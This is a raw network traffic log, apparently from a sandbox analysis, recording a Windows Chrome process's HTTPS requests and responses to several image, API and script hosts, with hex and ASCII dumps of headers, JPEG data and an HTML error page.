                                                                                                                                                          2024-06-09 22:41:13 UTC369OUTGET /pc/image-pc/video/gd_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:14 UTC602INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:13 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 17264
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-4370"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[17],EU-GER-frankfurt-EDGE4-CACHE2[14,TCP_MISS,16],EU-FRA-paris-GLOBAL1-CACHE20[4],EU-FRA-paris-GLOBAL1-CACHE30[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 494141
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 307fcb0d2064e77551c33303524ffd62
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          Age: 1
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:14 UTC15782INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:14 UTC1482INData Raw: 0f 8f 79 3c 4f 1e e5 6a f1 cf 79 b8 9f 13 cc 66 ae 71 b6 d9 db eb 7e 65 77 94 93 90 de dd ac 20 e3 ed 32 9b bb b0 63 6c 56 e1 a3 69 24 64 b7 69 66 79 54 b8 89 63 0a 80 6e 34 2b 6d 95 6b 42 22 46 23 40 0c cf 89 8f 19 49 9d bd 4c 00 c1 df 1c 95 fa 3b 8d 2a 32 26 22 47 51 2e ed 80 97 08 87 ff 00 4b 92 71 66 c1 04 c1 f3 6e 0b 63 cb f2 99 63 61 c8 79 1e 36 f7 8a 5c 61 f2 77 57 b2 ad bd ee 57 23 76 9d b9 ae 2e a4 92 e6 f0 5b 23 2b 6d 1d b6 90 80 ab 45 a9 34 b2 6d 2b ce 90 8b c6 24 4c 10 de 98 81 c0 61 17 f9 2a f1 ba a3 1a a6 4d 22 0c 08 2f 9c 89 e3 99 6f 9f 72 98 e0 f3 56 37 79 8e 2f 90 9b 15 2d be 0e cf 87 cd c5 f3 c6 58 94 ed 59 cd d1 32 59 43 24 a4 c8 b1 19 91 97 ba ea 5b 69 52 56 bb b4 f3 b3 9e 89 87 f3 19 eb 1e 0d 9e 18 3b 1c 82 68 de 40 4e 38 60 21 a4 f8
                                                                                                                                                          Data Ascii: y<Ojyfq~ew 2clVi$difyTcn4+mkB"F#@IL;*2&"GQ.Kqfnccay6\awWW#v.[#+mE4m+$La*M"/orV7y/-XY2YC$[iRV;h@N8`!


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          431192.168.2.550195103.117.134.214434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:13 UTC375OUTGET /zb-cloud/pwv/sn.settings.get HTTP/1.1
                                                                                                                                                          Host: ocsapi-lc.tingmeikj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:14 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:14 UTC23INData Raw: 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 30 0d 0a
                                                                                                                                                          Data Ascii: Server: Tengine/2.3.0
                                                                                                                                                          2024-06-09 22:41:14 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 31 34 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:14 GMT
                                                                                                                                                          2024-06-09 22:41:14 UTC16INData Raw: 61 70 69 2d 65 6c 61 70 73 65 64 3a 20 30 0d 0a
                                                                                                                                                          Data Ascii: api-elapsed: 0
                                                                                                                                                          2024-06-09 22:41:14 UTC34INData Raw: 78 2d 73 65 72 76 65 72 3a 20 41 6b 61 6d 61 69 4e 65 74 53 74 6f 72 61 67 65 28 6a 70 31 35 29 0d 0a
                                                                                                                                                          Data Ascii: x-server: AkamaiNetStorage(jp15)
                                                                                                                                                          2024-06-09 22:41:14 UTC32INData Raw: 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 61 6c 6c 6f 77 2d 6f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: access-control-allow-origin: *
                                                                                                                                                          2024-06-09 22:41:14 UTC82INData Raw: 78 2d 76 69 61 3a 20 31 2e 31 20 61 77 73 3a 6a 70 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 2c 20 31 2e 31 20 6f 63 73 61 70 69 3a 30 30 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 0d 0a
                                                                                                                                                          Data Ascii: x-via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          2024-06-09 22:41:14 UTC17INData Raw: 76 69 61 3a 20 31 2e 31 20 67 6f 6f 67 6c 65 0d 0a
                                                                                                                                                          Data Ascii: via: 1.1 google
                                                                                                                                                          2024-06-09 22:41:14 UTC36INData Raw: 58 2d 43 61 63 68 65 3a 20 4d 49 53 53 20 66 72 6f 6d 20 73 67 31 2d 63 64 6e 62 31 33 34 2d 30 32 31 0d 0a
                                                                                                                                                          Data Ascii: X-Cache: MISS from sg1-cdnb134-021
                                                                                                                                                          2024-06-09 22:41:14 UTC20INData Raw: 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 34 0d 0a
                                                                                                                                                          Data Ascii: Content-Length: 24
                                                                                                                                                          2024-06-09 22:41:14 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                                                                                                                          Data Ascii: Connection: close


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          432192.168.2.550198103.117.134.214434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:13 UTC376OUTGET /mt-cloud/api/sn.maintain.list HTTP/1.1
                                                                                                                                                          Host: ocsapi-lc.tingmeikj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:14 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:14 UTC23INData Raw: 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 30 0d 0a
                                                                                                                                                          Data Ascii: Server: Tengine/2.3.0
                                                                                                                                                          2024-06-09 22:41:14 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 31 34 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:14 GMT
                                                                                                                                                          2024-06-09 22:41:14 UTC16INData Raw: 61 70 69 2d 65 6c 61 70 73 65 64 3a 20 30 0d 0a
                                                                                                                                                          Data Ascii: api-elapsed: 0
                                                                                                                                                          2024-06-09 22:41:14 UTC34INData Raw: 78 2d 73 65 72 76 65 72 3a 20 41 6b 61 6d 61 69 4e 65 74 53 74 6f 72 61 67 65 28 6a 70 31 36 29 0d 0a
                                                                                                                                                          Data Ascii: x-server: AkamaiNetStorage(jp16)
                                                                                                                                                          2024-06-09 22:41:14 UTC32INData Raw: 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 61 6c 6c 6f 77 2d 6f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: access-control-allow-origin: *
                                                                                                                                                          2024-06-09 22:41:14 UTC82INData Raw: 78 2d 76 69 61 3a 20 31 2e 31 20 61 77 73 3a 6a 70 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 2c 20 31 2e 31 20 6f 63 73 61 70 69 3a 30 30 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 0d 0a
                                                                                                                                                          Data Ascii: x-via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          2024-06-09 22:41:14 UTC17INData Raw: 76 69 61 3a 20 31 2e 31 20 67 6f 6f 67 6c 65 0d 0a
                                                                                                                                                          Data Ascii: via: 1.1 google
                                                                                                                                                          2024-06-09 22:41:14 UTC36INData Raw: 58 2d 43 61 63 68 65 3a 20 4d 49 53 53 20 66 72 6f 6d 20 73 67 31 2d 63 64 6e 62 31 33 34 2d 30 32 31 0d 0a
                                                                                                                                                          Data Ascii: X-Cache: MISS from sg1-cdnb134-021
                                                                                                                                                          2024-06-09 22:41:14 UTC20INData Raw: 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 38 0d 0a
                                                                                                                                                          Data Ascii: Content-Length: 18
                                                                                                                                                          2024-06-09 22:41:14 UTC77INData Raw: 56 61 72 79 3a 20 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 48 65 61 64 65 72 73 2c 20 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 4d 65 74 68 6f 64 2c 20 4f 72 69 67 69 6e 0d 0a
                                                                                                                                                          Data Ascii: Vary: Access-Control-Request-Headers, Access-Control-Request-Method, Origin


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          433192.168.2.550197103.117.134.214434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:13 UTC370OUTGET /zb-cloud/pwv/agent.code HTTP/1.1
                                                                                                                                                          Host: ocsapi-lc.tingmeikj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:14 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:14 UTC23INData Raw: 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 30 0d 0a
                                                                                                                                                          Data Ascii: Server: Tengine/2.3.0
                                                                                                                                                          2024-06-09 22:41:14 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 31 34 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:14 GMT
                                                                                                                                                          2024-06-09 22:41:14 UTC16INData Raw: 61 70 69 2d 65 6c 61 70 73 65 64 3a 20 30 0d 0a
                                                                                                                                                          Data Ascii: api-elapsed: 0
                                                                                                                                                          2024-06-09 22:41:14 UTC34INData Raw: 78 2d 73 65 72 76 65 72 3a 20 41 6b 61 6d 61 69 4e 65 74 53 74 6f 72 61 67 65 28 6a 70 31 36 29 0d 0a
                                                                                                                                                          Data Ascii: x-server: AkamaiNetStorage(jp16)
                                                                                                                                                          2024-06-09 22:41:14 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:14 UTC82INData Raw: 58 2d 56 69 61 3a 20 31 2e 31 20 61 77 73 3a 6a 70 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 2c 20 31 2e 31 20 6f 63 73 61 70 69 3a 30 30 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 0d 0a
                                                                                                                                                          Data Ascii: X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          2024-06-09 22:41:14 UTC36INData Raw: 58 2d 43 61 63 68 65 3a 20 4d 49 53 53 20 66 72 6f 6d 20 73 67 31 2d 63 64 6e 62 31 33 34 2d 30 32 31 0d 0a
                                                                                                                                                          Data Ascii: X-Cache: MISS from sg1-cdnb134-021
                                                                                                                                                          2024-06-09 22:41:14 UTC20INData Raw: 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 34 0d 0a
                                                                                                                                                          Data Ascii: Content-Length: 24
                                                                                                                                                          2024-06-09 22:41:14 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                                                                                                                          Data Ascii: Connection: close
                                                                                                                                                          2024-06-09 22:41:14 UTC2INData Raw: 0d 0a
                                                                                                                                                          Data Ascii:


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          434192.168.2.55020723.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:14 UTC371OUTGET /pc/image-pc/video/lebo_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:14 UTC601INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:14 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 17920
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-4600"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[20],EU-GER-frankfurt-EDGE4-CACHE2[14,TCP_MISS,16],EU-FRA-paris-GLOBAL1-CACHE16[4],EU-FRA-paris-GLOBAL1-CACHE8[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 494140
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 882315377367ab377f212c6e7838079f
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          Age: 1
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:14 UTC15783INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:14 UTC2137INData Raw: b8 ce 5b 8a e3 32 45 e8 58 38 93 72 2e 3d 90 44 83 ff 00 d3 62 a5 40 76 65 b4 d8 29 e8 3f 87 f6 eb 59 fa 63 2f 3a b0 9c 85 b3 20 34 5b c6 3b e2 4f 75 68 e8 1c c4 29 4e 11 36 40 12 f2 7f 14 6e 90 1d c5 54 65 32 50 f2 1d 8f 49 80 81 83 ec ee ee 7a 15 cc 5f 77 75 ad bf d5 c9 91 6d b6 d3 6d ba 9b df 4b 75 69 53 94 1d e6 65 ce df a2 02 e5 55 a9 19 b3 44 47 99 ff 00 48 94 93 9b c5 e4 a7 84 39 8e ce cb c4 ad a4 9f e0 c7 4b 45 2e 1e be 6d e3 af df 6a 6a 52 af 73 38 2f 70 1d 76 14 b6 f2 72 66 a4 37 b5 f8 91 a4 26 23 88 20 e8 4e df 22 94 47 52 05 47 56 ca cd c2 99 87 19 15 33 d9 7d 89 68 46 d7 51 25 c4 3c e9 23 c5 4b 6c 04 9b fd 95 02 85 14 ab 54 b2 a9 45 c5 ea 28 a3 4a 97 1a 0c 77 65 cc 7d 11 a3 32 2e eb ce 1b 24 55 80 ad 57 4f e6 33 7c c9 6e 42 e3 81 78 bc 25 ca
                                                                                                                                                          Data Ascii: [2EX8r.=Db@ve)?Yc/: 4[;Ouh)N6@nTe2PIz_wummKuiSeUDGH9KE.mjjRs8/pvrf7&# N"GRGV3}hFQ%<#KlTE(Jwe}2.$UWO3|nBx%


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          435192.168.2.55019338.174.148.434434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:14 UTC735OUTGET /errors/605.html HTTP/1.1
                                                                                                                                                          Host: x551005.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                          Referer: https://x551005.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          Cookie: route=29c626d4e884fe4301eb6b56b4d56981
                                                                                                                                                          2024-06-09 22:41:15 UTC21INHTTP/1.1 605 unknow
                                                                                                                                                          2024-06-09 22:41:15 UTC44INData Raw: 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 32 35 39 32 30 30 30 0d 0a
                                                                                                                                                          Data Ascii: Strict-Transport-Security: max-age=2592000
                                                                                                                                                          2024-06-09 22:41:15 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 31 34 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:14 GMT
                                                                                                                                                          2024-06-09 22:41:15 UTC39INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: text/html;charset=UTF-8
                                                                                                                                                          2024-06-09 22:41:15 UTC25INData Raw: 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 7a 68 2d 43 4e 0d 0a
                                                                                                                                                          Data Ascii: Content-Language: zh-CN
                                                                                                                                                          2024-06-09 22:41:15 UTC29INData Raw: 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a
                                                                                                                                                          Data Ascii: X-Frame-Options: SAMEORIGIN
                                                                                                                                                          2024-06-09 22:41:15 UTC36INData Raw: 58 2d 43 61 63 68 65 3a 20 4d 49 53 53 20 66 72 6f 6d 20 63 64 6e 2d 53 74 61 72 6c 69 6e 6b 2d 4b 52 0d 0a
                                                                                                                                                          Data Ascii: X-Cache: MISS from cdn-Starlink-KR
                                                                                                                                                          2024-06-09 22:41:15 UTC22INData Raw: 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 35 34 39 0d 0a
                                                                                                                                                          Data Ascii: Content-Length: 4549
                                                                                                                                                          2024-06-09 22:41:15 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                                                                                                                          Data Ascii: Connection: close
                                                                                                                                                          2024-06-09 22:41:15 UTC2INData Raw: 0d 0a
                                                                                                                                                          Data Ascii:
                                                                                                                                                          2024-06-09 22:41:15 UTC4549INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6b 65 79 77 6f 72 64 73 22 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 61 75 74 68 6f 72 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 43 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 61 75 74 68 6f 72 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /><meta name="keywords" content="keywords"/><meta name="description" content="description"/><meta name="author" content="author" /><meta name="Copyright" content="author" /><meta name


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          436192.168.2.55020823.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:14 UTC559OUTGET /pc/240516-03/static/js/components/382/headerTip.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:14 UTC627INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:14 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 2824
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:38 GMT
                                                                                                                                                          ETag: "6645cabe-b08"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[6],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,5],EU-FRA-paris-GLOBAL1-CACHE7[3],EU-FRA-paris-GLOBAL1-CACHE29[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2473794
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 08bcb98809e1a837d55a3902ca5fa487
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 118206
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
